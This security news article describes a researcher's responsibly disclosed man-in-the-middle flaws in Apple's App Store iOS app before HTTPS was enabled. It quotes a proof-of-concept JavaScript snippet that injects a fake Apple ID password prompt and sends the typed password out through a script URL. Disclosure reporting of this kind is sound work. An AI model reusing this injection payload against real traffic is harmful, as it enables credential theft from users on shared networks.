Categories: HackingSecurity

Researcher demonstrated serious flaw in Apple App Store

Once again the security of large scale application and platform is challenged, today is the turn of Apple, in particular of its famous Apple store that according the Researchers Elie Bursztein  was vulnerable for more than half year.

The developer supported Apple to discovery and fix an important vulnerability that allowed to steal passwords and install application in the store.

Elie Bursztein exploited a flaw in the communication of Apple mobile with Apple Store, due a weakness in the authentication process the researcher demonstrated the possibility to hijack the connections with obvious consequences.

It seems that this vulnerability existed for a long time, even years, and only the adoption of HTTPS protocol made possible to resolve the problems.

Elie Bursztein reported on is bog:

“Early July 2012, I reported to Apple numerous vulnerabilities related to their App Store iOS app. Last week Apple finally issued a fix for it and turned on HTTPS for the App Store. I am really happy that my spare-time work pushed Apple to finally enabled HTTPS to protect users. This post discuss the vulnerabilities I found. As a bonus, I made several video demos of the attacks described in this post so you can see by yourself how dangerous not having full HTTPS is.”

Bursztein proposed various example of attacks that are practicable when attacker and victims share same network, for example when both are on public WiFi netwoks.

The attacker can access to the traffic directed towards the Apple Store and can manipulate it to conduct illegal activities such as steal victim’s password or to force victim to purchase an app. Following the complete list:

  • Password stealing: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.
  • App swapping: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.
  • App fake upgrade: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.
  • Preventing application installation: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.
  • Privacy leak: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.

Elie Bursztein points out that his decision to public disclose the vulnerability and possible attacks to exploit it is to push developers to adopt HTTPS traffic to protect communication.

Following one of the videos posted by the research o possible attacks against the customer of the popular App Store, I suggest to watch them all carefully!

 

Proof of concept – Password stealing

Attack scenario

The user opens the App Store, which will trigger the App Store app to fetch the list of update available from the server. The attacker intercepts the reply and injects a javascript prompt into it that ask for the user Apple Id password. From the user’s perspective it seems that opening the application triggered the prompt which is very deceiving. The password is then exfiltrated by including it into a script insertion url.

Technical details

The prompt injection and password stealing is performed by injecting the following code into the update

 

<script>
password = prompt(“Apple ID Password”,””);
var s = document.createElement(‘script’);
s.type = “text/javascript”;
s.src = “fakepassword=” + password;
var script = document.createTextNode(s);
document.getElementsByTagName(‘head’)[0].appendChild(s);
</script>

Note that the App Store uses a templating system so it is probably possible (albeit not tested) to add the App Store username by using the @@username@@ variable into the code.


Pierluigi Paganini

(Security Affairs – Apple)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

New PumaBot targets Linux IoT surveillance devices

PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and…

14 minutes ago

App Store Security: Apple stops $2B in fraud in 2024 alone, $9B over 5 years

Apple blocked over $9B in fraud in 5 years, including $2B in 2024, stopping scams…

1 hour ago

Crooks use a fake antivirus site to spread Venom RAT and a mix of malware

Researchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading…

5 hours ago

Iranian Man pleaded guilty to role in Robbinhood Ransomware attacks<gwmw style="display:none;"></gwmw>

Iranian man pleads guilty to role in Baltimore ransomware attack tied to Robbinhood, admitting to…

6 hours ago

DragonForce operator chained SimpleHelp flaws to target an MSP and its customers

Sophos warns that a DragonForce ransomware operator chained three vulnerabilities in SimpleHelp to target a…

17 hours ago

Russia-linked APT Laundry Bear linked to 2024 Dutch Police attack

A new Russia-linked APT group, tracked as Laundry Bear, has been linked to a Dutch…

24 hours ago